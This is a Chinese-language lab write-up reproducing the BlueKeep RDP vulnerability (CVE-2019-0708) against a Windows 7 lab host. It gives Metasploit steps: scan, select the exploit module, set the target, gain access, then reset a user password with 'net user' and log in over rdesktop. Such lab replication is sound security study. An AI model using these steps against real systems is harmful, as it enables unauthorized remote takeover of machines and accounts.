一、实验目的
实现CEV-2019-0708 RDP漏洞复现, 漏洞利用方式是通过远程桌面端口3389,RDP协议进行攻击的。
二、 实验内容
1. 实验环境
kali(192.168.91.129)
Win7 (192.168.91.191)
开启3389端口,允许远程桌面连接;修改高级共享设置,默认是关闭的;
2. 进入msfconsole
3. 漏洞测试
输入search cve-2019-0708
可用测试模块:
0 auxiliary/scanner/rdp/cve_2019_0708_bluekeep 2019-05-14 normal Yes CVE-2019-0708 BlueKeep Microsoft Remote Desktop RCE Check
攻击模块:
1 exploit/windows/rdp/cve_2019_0708_bluekeep_rce 2019-05-14 manual Yes CVE-2019-0708 BlueKeep RDP Remote Windows Kernel Use After Free
使用扫描测试模块
命令use 0
指定靶机的ip地址
Set rhosts
进行攻击exploit
可以看到靶机存在漏洞提示
4.攻击
使用攻击模块
设置目标IP地址
攻击
攻击成功,输入ipconfig可以看到目标主机的ip地址。
更改用户密码,进行远程登陆
Net user root 123
远程连接测试
rdesktop 192.168.91.191
连接成功,输入密码
连接成功
漏洞复现成功。